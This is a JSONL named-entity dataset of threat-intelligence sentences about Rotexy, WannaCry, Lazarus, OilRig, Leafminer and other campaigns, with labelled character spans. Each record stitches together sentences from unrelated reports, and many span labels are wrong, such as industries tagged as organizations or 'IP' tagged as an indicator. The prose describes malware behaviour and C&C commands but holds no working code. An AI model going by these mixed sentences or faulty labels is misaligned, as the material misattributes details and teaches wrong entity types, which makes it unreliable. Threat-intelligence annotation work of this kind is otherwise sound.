371, "label": "Malware"}, {"start": 399, "end": 421, "label": "Organization"}]} {"text": "The Trojan \u2019 s list of possible commands has remained practically unchanged throughout its life , and will be described below in detail . In one of the samples received for analysis , the US-CERT Code Analysis Team observed botnet controller functionality . 
We determined that these backdoors were installed on the targets ' machines on September 19 2018 , based mainly on the service creation time of the loader component .", "spans": [{"start": 188, "end": 214, "label": "Organization"}, {"start": 224, "end": 241, "label": "Malware"}]} {"text": "The Trojan \u2019 s assets folder contained the file data.db with a list of possible values for the User-Agent field for the PAGE command ( which downloads the specified webpage ) . Volgmer payloads have been observed in 32-bit form as either executables or dynamic-link library ( .dll ) Just last week Lazarus were found stealing millions from ATMs across Asia and Africa .", "spans": [{"start": 48, "end": 55, "label": "Indicator"}, {"start": 177, "end": 184, "label": "System"}, {"start": 276, "end": 280, "label": "Malware"}, {"start": 298, "end": 305, "label": "Organization"}]} {"text": "If the value of this field failed to arrive from the C & C , it was selected from the file data.db using a pseudo-random algorithm . Trend Micro endpoint solutions such as Trend Micro\u2122 Smart Protection Suites and Worry-Free\u2122 Business Security can protect users and businesses from these threats by detecting malicious files and spammed messages as well as blocking all related malicious URLs . 
These and other tools used by the Lazarus group can be mitigated by routinely scanning the network for any malicious activity to help prevent the malware from entering and spreading through an organization .", "spans": [{"start": 91, "end": 98, "label": "Indicator"}, {"start": 133, "end": 144, "label": "Organization"}, {"start": 172, "end": 208, "label": "Organization"}, {"start": 213, "end": 242, "label": "Organization"}, {"start": 265, "end": 275, "label": "Organization"}, {"start": 308, "end": 323, "label": "Malware"}, {"start": 428, "end": 441, "label": "Organization"}]} {"text": "2015\u20132016 Starting from mid-2015 , the Trojan began using the AES algorithm to encrypt data communicated between the infected device and the C & C : Also starting with the same version , data is sent in a POST request to the relative address with the format \u201c / [ number ] \u201d ( a pseudo-randomly generated number in the range 0\u20139999 ) . WannaCry appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD ( via Bitcoin ) to decrypt the data . The backdoors Lazarus are deploying are difficult to detect and a significant threat to the privacy and security of enterprises , allowing attackers to steal information , delete files , install malware , and more .", "spans": [{"start": 336, "end": 344, "label": "System"}, {"start": 383, "end": 388, "label": "Malware"}, {"start": 401, "end": 436, "label": "Malware"}, {"start": 520, "end": 527, "label": "Organization"}, {"start": 622, "end": 633, "label": "Organization"}, {"start": 645, "end": 654, "label": "Organization"}]} {"text": "In some samples , starting from January 2016 , an algorithm has been implemented for unpacking the encrypted executable DEX file from the assets folder . Some of the documents exploited CVE-2017-0199 to deliver the payload . 
Trend Micro endpoint solutions such as Trend Micro\u2122 Smart Protection Suites and Worry-Free\u2122 Business Security can protect users and businesses from these threats by detecting malicious files and spammed messages as well as blocking all related malicious URLs .", "spans": [{"start": 166, "end": 175, "label": "Malware"}, {"start": 186, "end": 199, "label": "Vulnerability"}, {"start": 203, "end": 222, "label": "Malware"}, {"start": 225, "end": 236, "label": "Organization"}, {"start": 264, "end": 300, "label": "Organization"}, {"start": 305, "end": 334, "label": "Organization"}, {"start": 357, "end": 367, "label": "Organization"}, {"start": 400, "end": 415, "label": "Indicator"}]} {"text": "In this version of Rotexy , dynamic generation of lowest-level domains was not used . The Leviathan also occasionally used macro-laden Microsoft Word documents to target other US research and development organizations during this period . FBI has high confidence that HIDDEN COBRA actors are using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation .", "spans": [{"start": 19, "end": 25, "label": "Malware"}, {"start": 90, "end": 99, "label": "Organization"}, {"start": 123, "end": 159, "label": "Malware"}, {"start": 192, "end": 217, "label": "Organization"}, {"start": 239, "end": 242, "label": "Organization"}, {"start": 268, "end": 287, "label": "Organization"}]} {"text": "2016 From mid-2016 on , the cybercriminals returned to dynamic generation of lowest-level domains . The download name was \" Zawgyi_Keyboard_L.zip \" , and it dropped a \" setup.exe \" that contained several backdoor components , including an Elise \" wincex.dll \" ( a42c966e26f3577534d03248551232f3 , detected as Backdoor.Win32.Agent.delp ) . 
Ransomware that has been publicly named \" WannaCry \" , \" WCry \" or \" WanaCrypt0r \" ( based on strings in the binary and encrypted files ) has spread to at least 74 countries as of Friday 12 May 2017 , reportedly targeting Russia initially , and spreading to telecommunications , shipping , car manufacturers , universities and health care industries , among others .", "spans": [{"start": 124, "end": 145, "label": "Malware"}, {"start": 169, "end": 178, "label": "Malware"}, {"start": 239, "end": 244, "label": "System"}, {"start": 247, "end": 257, "label": "Malware"}, {"start": 381, "end": 389, "label": "Malware"}, {"start": 396, "end": 400, "label": "Malware"}, {"start": 408, "end": 419, "label": "Malware"}, {"start": 597, "end": 615, "label": "Organization"}, {"start": 618, "end": 626, "label": "Organization"}, {"start": 629, "end": 646, "label": "Organization"}, {"start": 649, "end": 661, "label": "Organization"}, {"start": 666, "end": 688, "label": "Organization"}]} {"text": "No other significant changes were observed in the Trojan \u2019 s network behavior . Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 . 
Ransomware that has been publicly named \" WannaCry \" , \" WCry \" or \" WanaCrypt0r \" ( based on strings in the binary and encrypted files ) has spread to at least 74 countries as of Friday 12 May 2017 , reportedly targeting Russia initially , and spreading to telecommunications , shipping , car manufacturers , universities and health care industries , among others .", "spans": [{"start": 101, "end": 125, "label": "Malware"}, {"start": 154, "end": 218, "label": "Vulnerability"}, {"start": 230, "end": 243, "label": "Vulnerability"}, {"start": 288, "end": 296, "label": "Malware"}, {"start": 303, "end": 307, "label": "Malware"}, {"start": 315, "end": 326, "label": "Malware"}, {"start": 504, "end": 522, "label": "Organization"}, {"start": 525, "end": 533, "label": "Organization"}, {"start": 536, "end": 553, "label": "Organization"}, {"start": 556, "end": 568, "label": "Organization"}, {"start": 573, "end": 595, "label": "Organization"}]} {"text": "In late 2016 , versions of the Trojan emerged that contained the card.html phishing page in the assets/www folder . To set up persistence , the loader writes a file to \" c:\\temp\\rr.exe \" and executes it with specific command line arguments to create auto run registry keys . We also saw that the attack technique bears some resemblance to a previous 2017 Lazarus attack , analyzed by BAE Systems , against targets in Asia .", "spans": [{"start": 65, "end": 74, "label": "Indicator"}, {"start": 96, "end": 106, "label": "Indicator"}, {"start": 170, "end": 184, "label": "Malware"}, {"start": 243, "end": 272, "label": "Malware"}, {"start": 384, "end": 395, "label": "Organization"}]} {"text": "The page was designed to steal users \u2019 bank card details : 2017\u20132018 From early 2017 , the HTML phishing pages bank.html , update.html and extortionist.html started appearing in the assets folder . The Magic Hound campaign was also discovered using a custom dropper tool , which we have named MagicHound.DropIt . 
WannaCry utilizes EternalBlue by crafting a custom SMB session request with hard-coded values based on the target system .", "spans": [{"start": 111, "end": 120, "label": "Indicator"}, {"start": 123, "end": 134, "label": "Indicator"}, {"start": 139, "end": 156, "label": "Indicator"}, {"start": 251, "end": 265, "label": "System"}, {"start": 293, "end": 310, "label": "Malware"}, {"start": 313, "end": 321, "label": "Malware"}, {"start": 331, "end": 342, "label": "Vulnerability"}, {"start": 364, "end": 367, "label": "Malware"}]} {"text": "Also , in some versions of the Trojan the file names were random strings of characters . For example , we analyzed a DropIt sample ( SHA256 : cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671 ) that dropped two executables , one of which was saved to \" %TEMP%\\flash_update.exe \" that was a legitimate Flash Player installer . Notably , after the first SMB packet sent to the victim 's IP address , WannaCry sends two additional packets to the victim containing the hard-coded IP addresses 192.168.56.20 and 172.16.99.5 .", "spans": [{"start": 117, "end": 130, "label": "System"}, {"start": 214, "end": 237, "label": "Malware"}, {"start": 268, "end": 291, "label": "Malware"}, {"start": 316, "end": 338, "label": "System"}, {"start": 400, "end": 402, "label": "Indicator"}, {"start": 413, "end": 421, "label": "Malware"}, {"start": 491, "end": 493, "label": "Indicator"}]} {"text": "In 2018 , versions of Rotexy emerged that contacted the C & C using its IP address . During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros . 
WannaCry ( also known as WCry or WanaCryptor ) malware is a self-propagating ( worm-like ) ransomware that spreads through internal networks and over the public internet by exploiting a vulnerability in Microsoft 's Server Message Block ( SMB ) protocol , MS17-010 .", "spans": [{"start": 22, "end": 28, "label": "Malware"}, {"start": 112, "end": 117, "label": "Organization"}, {"start": 159, "end": 184, "label": "Malware"}, {"start": 227, "end": 235, "label": "Malware"}, {"start": 252, "end": 256, "label": "Malware"}, {"start": 260, "end": 271, "label": "Malware"}, {"start": 318, "end": 328, "label": "Malware"}, {"start": 430, "end": 439, "label": "Organization"}, {"start": 443, "end": 463, "label": "System"}, {"start": 466, "end": 469, "label": "System"}]} {"text": "\u2018 One-time \u2019 domains also appeared with names made up of random strings of characters and numbers , combined with the top-level domains .cf , .ga , .gq , .ml , or .tk . The HTA files contained job descriptions and links to job postings on popular employment websites . The WannaCry malware consists of two distinct components , one that provides ransomware functionality and a component used for propagation , which contains functionality to enable SMB exploitation capabilities .", "spans": [{"start": 173, "end": 182, "label": "Malware"}, {"start": 183, "end": 219, "label": "Malware"}, {"start": 273, "end": 281, "label": "Malware"}, {"start": 282, "end": 289, "label": "Malware"}, {"start": 449, "end": 452, "label": "Malware"}]} {"text": "At this time , the Trojan also began actively using different methods of obfuscation . These emails included recruitment-themed lures and links to malicious HTML application ( HTA ) files . 
WannaCry leverages an exploit , codenamed \" EternalBlue \" , that was released by the Shadow Brokers on April 14 , 2017 .", "spans": [{"start": 157, "end": 173, "label": "System"}, {"start": 176, "end": 179, "label": "Malware"}, {"start": 190, "end": 198, "label": "Malware"}, {"start": 212, "end": 219, "label": "Vulnerability"}, {"start": 234, "end": 245, "label": "Vulnerability"}, {"start": 275, "end": 289, "label": "Organization"}]} {"text": "For example , the DEX file is packed with garbage strings and/or operations , and contains a key to decipher the main executable file from the APK . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . WannaCry appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD ( via Bitcoin ) to decrypt the data .", "spans": [{"start": 149, "end": 157, "label": "System"}, {"start": 190, "end": 198, "label": "Malware"}, {"start": 214, "end": 227, "label": "Vulnerability"}, {"start": 230, "end": 238, "label": "Malware"}, {"start": 277, "end": 282, "label": "Indicator"}, {"start": 368, "end": 375, "label": "System"}]} {"text": "Latest version ( 2018 ) Let \u2019 s now return to the present day and a detailed description of the functionality of a current representative of the Rotexy family ( SHA256 : ba4beb97f5d4ba33162f769f43ec8e7d1ae501acdade792a4a577cd6449e1a84 ) . ChopShop1 is a new framework developed by the MITRE Corporation for network-based protocol decoders that enable security professionals to understand actual commands issued by human operators controlling endpoints . 
In May 2017 , SecureWorks\u00ae Counter Threat Unit\u00ae ( CTU ) researchers investigated a widespread and opportunistic WCry ( also known as WanaCry , WanaCrypt , and Wana Decrypt0r ) ransomware campaign that impacted many systems around the world .", "spans": [{"start": 145, "end": 151, "label": "Malware"}, {"start": 170, "end": 234, "label": "Indicator"}, {"start": 239, "end": 248, "label": "Malware"}, {"start": 285, "end": 302, "label": "Organization"}, {"start": 344, "end": 373, "label": "Malware"}, {"start": 468, "end": 501, "label": "Organization"}, {"start": 504, "end": 507, "label": "Organization"}, {"start": 566, "end": 570, "label": "Malware"}, {"start": 587, "end": 594, "label": "Malware"}, {"start": 597, "end": 606, "label": "Malware"}, {"start": 613, "end": 627, "label": "Malware"}]} {"text": "Application launch When launching for the first time , the Trojan checks if it is being launched in an emulation environment , and in which country it is being launched . Attachments are typically sent as an executable file embedded in a ZIP archive or a password-protected Microsoft Office document . In November 2017 , SecureWorks Counter Threat Unit ( CTU ) researchers investigated a widespread and opportunistic WCry ransomware campaign that impacted many systems around the world .", "spans": [{"start": 171, "end": 182, "label": "Malware"}, {"start": 321, "end": 352, "label": "Organization"}, {"start": 355, "end": 358, "label": "Organization"}]} {"text": "If the device is located outside Russia or is an emulator , the application displays a stub page : In this case , the Trojan \u2019 s logs contain records in Russian with grammatical errors and spelling mistakes : If the check is successful , Rotexy registers with GCM and launches SuperService which tracks if the Trojan has device administrator privileges . This blog post analyzes several recent Molerats attacks that deployed PIVY against targets in the Middle East and in the U.S. 
We also examine additional PIVY attacks that leverage Arabic-language content related to the ongoing crisis in Egypt and the wider Middle East to lure targets into opening malicious files . Microsoft addressed the SMBv1 vulnerabilities in March 2017 with Security Bulletin MS17-010 .", "spans": [{"start": 238, "end": 244, "label": "Malware"}, {"start": 260, "end": 263, "label": "System"}, {"start": 425, "end": 429, "label": "System"}, {"start": 653, "end": 668, "label": "Malware"}, {"start": 671, "end": 680, "label": "Organization"}, {"start": 695, "end": 700, "label": "System"}, {"start": 701, "end": 716, "label": "Vulnerability"}]} {"text": "SuperService also tracks its own status and relaunches if stopped . The archive contains an .exe file , sometimes disguised as a Microsoft Word file , a video , or another file format , using the corresponding icon . The worm leverages an SMBv1 exploit that originates from tools released by the Shadow Brokers threat group in April .", "spans": [{"start": 92, "end": 101, "label": "Malware"}, {"start": 129, "end": 148, "label": "Malware"}, {"start": 239, "end": 244, "label": "System"}, {"start": 245, "end": 252, "label": "Vulnerability"}, {"start": 296, "end": 310, "label": "Organization"}]} {"text": "It performs a privilege check once every second ; if unavailable , the Trojan starts requesting them from the user in an infinite loop : If the user agrees and gives the application the requested privileges , another stub page is displayed , and the app hides its icon : If the Trojan detects an attempt to revoke its administrator privileges , it starts periodically switching off the phone screen , trying to stop the user actions . The Palo Alto Networks Unit 42 research team recently came across a series of malicious files which were almost identical to those targeting the Saudi Arabian government previously discussed by MalwareBytes . 
If the DoublePulsar backdoor does not exist , then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit .", "spans": [{"start": 439, "end": 465, "label": "Organization"}, {"start": 513, "end": 528, "label": "Malware"}, {"start": 594, "end": 604, "label": "Organization"}, {"start": 629, "end": 641, "label": "Organization"}, {"start": 651, "end": 672, "label": "Malware"}, {"start": 699, "end": 707, "label": "Malware"}, {"start": 752, "end": 763, "label": "Vulnerability"}, {"start": 764, "end": 769, "label": "System"}, {"start": 770, "end": 777, "label": "Vulnerability"}]} {"text": "If the privileges are revoked successfully , the Trojan relaunches the cycle of requesting administrator privileges . We found new variants of the Powermud backdoor , a new backdoor ( Backdoor.Powemuddy ) , and custom tools for stealing passwords , creating reverse shells , privilege escalation , and the use of the native Windows cabinet creation tool , makecab.exe , probably for compressing stolen data to be uploaded . 
WCry uses a combination of the RSA and AES algorithms to encrypt files .", "spans": [{"start": 147, "end": 164, "label": "System"}, {"start": 184, "end": 202, "label": "Malware"}, {"start": 211, "end": 223, "label": "System"}, {"start": 228, "end": 246, "label": "Malware"}, {"start": 249, "end": 272, "label": "Malware"}, {"start": 275, "end": 295, "label": "Malware"}, {"start": 306, "end": 353, "label": "Malware"}, {"start": 356, "end": 367, "label": "Malware"}, {"start": 424, "end": 428, "label": "Malware"}, {"start": 455, "end": 458, "label": "Malware"}, {"start": 463, "end": 466, "label": "Malware"}]} {"text": "If , for some reason , SuperService does not switch off the screen when there is an attempt to revoke the device administrator privileges , the Trojan tries to intimidate the user : While running , Rotexy tracks the following : switching on and rebooting of the phone ; termination of its operation \u2013 in this case , it relaunches ; sending of an SMS by the app \u2013 in this case , the phone is switched to silent mode . Analysts in our DeepSight Managed Adversary and Threat Intelligence ( MATI ) team have found a new backdoor , Backdoor.Powemuddy , new variants of Seedworm 's Powermud backdoor ( aka POWERSTATS ) , a GitHub repository used by the group to store their scripts , as well as several post-compromise tools the group uses to exploit victims once they have established a foothold in their network . 
The campaign 's use of an SMB worm to distribute WCry contributed to the ransomware 's virulence .", "spans": [{"start": 198, "end": 204, "label": "Malware"}, {"start": 433, "end": 484, "label": "Organization"}, {"start": 487, "end": 491, "label": "Organization"}, {"start": 527, "end": 545, "label": "Malware"}, {"start": 564, "end": 572, "label": "Organization"}, {"start": 576, "end": 593, "label": "Malware"}, {"start": 600, "end": 610, "label": "System"}, {"start": 647, "end": 652, "label": "Organization"}, {"start": 723, "end": 728, "label": "Organization"}, {"start": 836, "end": 844, "label": "Malware"}, {"start": 859, "end": 863, "label": "Malware"}]} {"text": "C & C communications The default C & C address is hardwired in the Rotexy code : The relative address to which the Trojan will send information from the device is generated in a pseudo-random manner . Like the previous campaigns , these samples again involve a Microsoft Word document embedded with a malicious macro that is capable of executing PowerShell ( PS ) scripts leading to a backdoor payload . Last week Microsoft , working together with Facebook and others in the security community , took strong steps to protect our customers and the internet from ongoing attacks by an advanced persistent threat actor known to us as ZINC , also known as the Lazarus Group .", "spans": [{"start": 67, "end": 73, "label": "Malware"}, {"start": 261, "end": 284, "label": "Malware"}, {"start": 372, "end": 401, "label": "Malware"}, {"start": 414, "end": 423, "label": "Organization"}, {"start": 448, "end": 456, "label": "Organization"}, {"start": 475, "end": 493, "label": "Organization"}, {"start": 631, "end": 635, "label": "Organization"}, {"start": 656, "end": 669, "label": "Organization"}]} {"text": "Depending on the Trojan version , dynamically generated subdomains can also be used . In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign . 
Last week Microsoft , working together with Facebook , took strong steps to protect our customers and the internet from ongoing attacks by the Lazarus Group .", "spans": [{"start": 100, "end": 111, "label": "Organization"}, {"start": 145, "end": 164, "label": "Malware"}, {"start": 216, "end": 225, "label": "Organization"}, {"start": 250, "end": 258, "label": "Organization"}, {"start": 349, "end": 362, "label": "Organization"}]} {"text": "The Trojan stores information about C & C servers and the data harvested from the infected device in a local SQLite database . In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign . We concluded that Lazarus Group was responsible for WannaCry , a destructive malware .", "spans": [{"start": 141, "end": 152, "label": "Organization"}, {"start": 186, "end": 205, "label": "Malware"}, {"start": 265, "end": 278, "label": "Organization"}, {"start": 299, "end": 307, "label": "Malware"}]} {"text": "First off , the Trojan registers in the administration panel and receives the information it needs to operate from the C & C ( the SMS interception templates and the text that will be displayed on HTML pages ) : Rotexy intercepts all incoming SMSs and processes them according to the templates it received from the C & C . This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent . 
We concluded that Lazarus Group was responsible for WannaCry , a destructive attack in May that targeted Microsoft customers .", "spans": [{"start": 212, "end": 218, "label": "Malware"}, {"start": 328, "end": 341, "label": "Malware"}, {"start": 391, "end": 404, "label": "Malware"}, {"start": 425, "end": 438, "label": "Vulnerability"}, {"start": 614, "end": 627, "label": "Organization"}, {"start": 648, "end": 656, "label": "Malware"}, {"start": 701, "end": 720, "label": "Organization"}]} {"text": "Also , when an SMS arrives , the Trojan puts the phone into silent mode and switches off the screen so the user doesn \u2019 t notice that a new SMS has arrived . Taking a step back , as discussed in the Appendix in our initial OilRig blog , Clayslide delivery documents initially open with a worksheet named \" Incompatible \" that displays content that instructs the user to \" Enable Content \" to see the contents of the document , which in fact runs the malicious macro and compromises the system . Today , the governments of the United States , United Kingdom , Australia , Canada , New Zealand and Japan have all announced that the government of North Korea is responsible for the activities of ZINC/Lazarus .", "spans": [{"start": 223, "end": 229, "label": "Organization"}, {"start": 237, "end": 265, "label": "Malware"}, {"start": 441, "end": 465, "label": "Malware"}, {"start": 470, "end": 492, "label": "Malware"}, {"start": 507, "end": 518, "label": "Organization"}, {"start": 693, "end": 705, "label": "Organization"}]} {"text": "When required , the Trojan sends an SMS to the specified phone number with the information it has received from the intercepted message . The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 . 
In November 2017 , Secureworks Counter Threat Unit\u2122 ( CTU ) researchers discovered the North Korean cyber threat group , known as Lazarus Group and internally tracked as NICKEL ACADEMY by Secureworks , had launched a malicious spearphishing campaign using the lure of a job opening for the CFO role at a European-based cryptocurrency company .", "spans": [{"start": 181, "end": 190, "label": "Malware"}, {"start": 206, "end": 219, "label": "Vulnerability"}, {"start": 241, "end": 273, "label": "Organization"}, {"start": 276, "end": 279, "label": "Organization"}, {"start": 352, "end": 365, "label": "Organization"}, {"start": 392, "end": 406, "label": "Organization"}, {"start": 410, "end": 421, "label": "Organization"}, {"start": 541, "end": 563, "label": "Organization"}]} {"text": "( It is specified in the interception template whether a reply must be sent , and which text should be sent to which address . The vulnerability exists in the old Equation Editor ( EQNEDT32.EXE ) , a component of Microsoft Office that is used to insert and evaluate mathematical formulas . In November 2017 , CTU researchers discovered the North Korean cyber threat group , known as Lazarus Group , had launched a malicious spearphishing campaign using the lure of a job opening for the CFO role at a European-based cryptocurrency company .", "spans": [{"start": 163, "end": 178, "label": "System"}, {"start": 181, "end": 193, "label": "Malware"}, {"start": 246, "end": 287, "label": "Malware"}, {"start": 309, "end": 312, "label": "Organization"}, {"start": 383, "end": 396, "label": "Organization"}, {"start": 516, "end": 538, "label": "Organization"}]} {"text": ") If the application hasn \u2019 t received instructions about the rules for processing incoming SMSs , it simply saves all SMSs to a local database and uploads them to the C & C . 
The January 8 attack used a variant of the ThreeDollars delivery document , which we identified as part of the OilRig toolset based on attacks that occurred in August 2017 . Bankshot is designed to persist on a victim 's network for further exploitation ; thus the Advanced Threat Research team believes this operation is intended to gain access to specific financial organizations .", "spans": [{"start": 219, "end": 249, "label": "Malware"}, {"start": 287, "end": 293, "label": "Organization"}, {"start": 350, "end": 358, "label": "Malware"}, {"start": 441, "end": 465, "label": "Organization"}, {"start": 534, "end": 557, "label": "Organization"}]} {"text": "Apart from general information about the device , the Trojan sends a list of all the running processes and installed applications to the C & C . The email contained an attachment named Seminar-Invitation.doc , which is a malicious Microsoft Word document we track as ThreeDollars . CTU researchers assess this as the continuation of activity first observed in 2016 , and it is likely that the campaign is ongoing .", "spans": [{"start": 185, "end": 207, "label": "Malware"}, {"start": 231, "end": 245, "label": "System"}, {"start": 267, "end": 279, "label": "System"}, {"start": 282, "end": 285, "label": "Organization"}]} {"text": "It \u2019 s possible the threat actors use this list to find running antivirus or banking applications . We also identified another sample of ThreeDollars , created on January 15 , 2017 with the file name strategy preparation.dot . 
CTU researchers have observed NICKEL ACADEMY ( Lazarus ) copying and pasting job descriptions from online recruitment sites in previous campaigns .", "spans": [{"start": 137, "end": 149, "label": "System"}, {"start": 209, "end": 224, "label": "Malware"}, {"start": 227, "end": 230, "label": "Organization"}, {"start": 257, "end": 271, "label": "Organization"}, {"start": 274, "end": 281, "label": "Organization"}]} {"text": "Rotexy will perform further actions after it receives the corresponding commands : START , STOP , RESTART \u2014 start , stop , restart SuperService . We had previously observed this author name in use once before , in the very first ThreeDollars document we collected that we had reported on in August 2017 . There are several indicators , which have led CTU researchers to believe with high confidence that NICKEL ACADEMY is behind the current spearphishing campaign .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 229, "end": 250, "label": "Malware"}, {"start": 351, "end": 354, "label": "Organization"}, {"start": 404, "end": 418, "label": "Organization"}]} {"text": "URL \u2014 update C & C address . The June 2017 sample of Clayslide contained the same OfficeServicesStatus.vbs file found in the ISMAgent Clayslide document , but instead of having the payload embedded in the macro as segregated base64 strings that would be concatenated , this variant obtained its payload from multiple cells within the \" Incompatible \" worksheet . 
CTU researchers also identified components in the custom C2 protocol being used which they have seen utilized by Nickel Academy ( Lazarus ) previously .", "spans": [{"start": 53, "end": 62, "label": "System"}, {"start": 82, "end": 111, "label": "Malware"}, {"start": 125, "end": 152, "label": "System"}, {"start": 363, "end": 366, "label": "Organization"}, {"start": 413, "end": 431, "label": "Malware"}, {"start": 476, "end": 490, "label": "Organization"}, {"start": 493, "end": 500, "label": "Organization"}]} {"text": "MESSAGE \u2013 send SMS containing specified text to a specified number . During this testing , we saw document filenames that contain the C2 we witnessed in the targeted attack above , specifically the filenames XLS-withyourface.xls and XLS-withyourface \u2013 test.xls . CTU researchers also identified components in the custom C2 protocol being used ( the ACT in which the malware talks to the Command and Control Servers ) which they have seen utilized by Nickel Academy ( Lazarus ) previously .", "spans": [{"start": 208, "end": 228, "label": "Malware"}, {"start": 233, "end": 260, "label": "Malware"}, {"start": 263, "end": 266, "label": "Organization"}, {"start": 313, "end": 331, "label": "Malware"}, {"start": 450, "end": 464, "label": "Organization"}, {"start": 467, "end": 474, "label": "Organization"}]} {"text": "UPDATE_PATTERNS \u2013 reregister in the administration panel . These samples appeared to have been created by OilRig during their development and testing activities , all of which share many similarities with the delivery document used in the recent OilRig attack against a Middle Eastern government , N56.15.doc ( 7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00 ) that we have also included in Table 1 . 
Leafminer attempts to infiltrate target networks through various means of intrusion : watering hole websites , vulnerability scans of network services on the internet , and brute-force login attempts .", "spans": [{"start": 106, "end": 112, "label": "Organization"}, {"start": 285, "end": 295, "label": "Organization"}, {"start": 298, "end": 308, "label": "Malware"}, {"start": 418, "end": 427, "label": "Organization"}]} {"text": "UNBLOCK \u2013 unblock the telephone ( revoke device administrator privileges from the app ) . The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East . The researchers found that there are common elements in the macro and in the first- stage RAT used in this campaign , with former campaigns of the NICKEL ACADEMY ( Lazarus ) threat group .", "spans": [{"start": 94, "end": 103, "label": "Organization"}, {"start": 150, "end": 159, "label": "Malware"}, {"start": 163, "end": 202, "label": "Organization"}, {"start": 314, "end": 317, "label": "Malware"}, {"start": 371, "end": 385, "label": "Organization"}, {"start": 388, "end": 395, "label": "Organization"}]} {"text": "UPDATE \u2013 download APK file from C & C and install it . In the first week of May 2016 , FireEye 's DTI identified a wave of emails containing malicious attachments being sent to multiple banks in the Middle East region . 
During our investigation , there was a breakthrough discovery that helped connect Leafminer to a number of attacks observed on systems in the Middle East and identify the toolkit used in the group 's efforts of intrusion , lateral movement , and Exfiltration .", "spans": [{"start": 87, "end": 101, "label": "Organization"}, {"start": 141, "end": 162, "label": "Malware"}, {"start": 186, "end": 191, "label": "Organization"}, {"start": 302, "end": 311, "label": "Organization"}]} {"text": "This command can be used not just to update the app but to install any other software on the infected device . Their next move was to list any remote shared drives and then attempt to access remote shares owned by the specific government office they were targeting , again attempting to extract all Word documents . As of early June 2018 , the server hosted 112 files in a subdirectory that could be accessed through a public web shell planted by the Leafminer .", "spans": [{"start": 227, "end": 244, "label": "Organization"}, {"start": 299, "end": 313, "label": "Malware"}, {"start": 419, "end": 435, "label": "Malware"}, {"start": 451, "end": 460, "label": "Organization"}]} {"text": "CONTACTS \u2013 send text received from C & C to all user contacts . For example , in September 2016 , Sowbug infiltrated an organization in Asia , deploying the Felismus backdoor on one of its computers , Computer A , using the file name adobecms.exe in CSIDL_WINDOWS\\debug . As of early June 2018 , the server hosted 112 files in a subdirectory that could be accessed through a public web shell planted by the attackers .", "spans": [{"start": 98, "end": 104, "label": "Organization"}, {"start": 157, "end": 174, "label": "System"}, {"start": 234, "end": 246, "label": "Malware"}, {"start": 250, "end": 269, "label": "Malware"}, {"start": 375, "end": 391, "label": "Malware"}, {"start": 407, "end": 416, "label": "Organization"}]} {"text": "This is most probably how the application spreads . 
Symantec has found evidence of Starloader files being named AdobeUpdate.exe , AcrobatUpdate.exe , and INTELUPDATE.EXE among others . The Leafminer 's post-compromise toolkit suggests that Leafminer is looking for email data , files , and database servers on compromised target systems .", "spans": [{"start": 52, "end": 60, "label": "Organization"}, {"start": 83, "end": 99, "label": "Malware"}, {"start": 112, "end": 127, "label": "Malware"}, {"start": 130, "end": 147, "label": "Malware"}, {"start": 154, "end": 169, "label": "Malware"}, {"start": 189, "end": 198, "label": "Organization"}, {"start": 240, "end": 249, "label": "Organization"}, {"start": 265, "end": 270, "label": "System"}]} {"text": "CONTACTS_PRO \u2013 request unique message text for contacts from the address book . The attackers then began to perform reconnaissance activities on Computer A via cmd.exe , collecting system-related information , such as the OS version , hardware configuration , and network information . Researching the hacker handle MagicCoder results in references to the Iranian hacking forum Ashiyane as well as defacements by the Iranian hacker group Sun Army .", "spans": [{"start": 160, "end": 167, "label": "Malware"}, {"start": 170, "end": 207, "label": "Malware"}, {"start": 302, "end": 308, "label": "Organization"}, {"start": 378, "end": 386, "label": "Organization"}, {"start": 438, "end": 446, "label": "Organization"}]} {"text": "PAGE \u2013 contact URL received from C & C using User-Agent value that was also received from C & C or local database . In September 2015 , Kaspersky Lab 's Anti-Targeted Attack Platform discovered anomalous network traffic in a government organization network . 
Targeted regions included in the list of Leafminer are Saudi Arabia , United Arab Emirates , Qatar , Kuwait , Bahrain , Egypt , Israel , and Afghanistan .", "spans": [{"start": 136, "end": 149, "label": "Organization"}, {"start": 194, "end": 219, "label": "Malware"}, {"start": 225, "end": 248, "label": "Organization"}, {"start": 300, "end": 309, "label": "Organization"}]} {"text": "ALLMSG \u2013 send C & C all SMSs received and sent by user , as stored in phone memory . Symantec detects this threat as Backdoor.Nidiran . Our investigation of Leafminer started with the discovery of JavaScript code on several compromised websites in the Middle East .", "spans": [{"start": 85, "end": 93, "label": "Organization"}, {"start": 117, "end": 133, "label": "Malware"}, {"start": 157, "end": 166, "label": "Organization"}, {"start": 197, "end": 212, "label": "Malware"}, {"start": 224, "end": 244, "label": "Malware"}]} {"text": "ALLCONTACTS \u2013 send all contacts from phone memory to C & C . Attackers have been known to distribute malicious files masquerading as the legitimate iviewers.dll file and then use DLL load hijacking to execute the malicious code and infect the computer . This included the Fuzzbunch framework that was part of an infamous leak of exploits and tools by the Shadow Brokers in April 2017 .", "spans": [{"start": 101, "end": 116, "label": "Malware"}, {"start": 148, "end": 165, "label": "System"}, {"start": 179, "end": 197, "label": "System"}, {"start": 272, "end": 281, "label": "Malware"}, {"start": 355, "end": 369, "label": "Organization"}]} {"text": "ONLINE \u2013 send information about Trojan \u2019 s current status to C & C : whether it has device administrator privileges , which HTML page is currently displayed , whether screen is on or off , etc . Once exploit has been achieved , Nidiran is delivered through a self-extracting executable that extracts the components to a 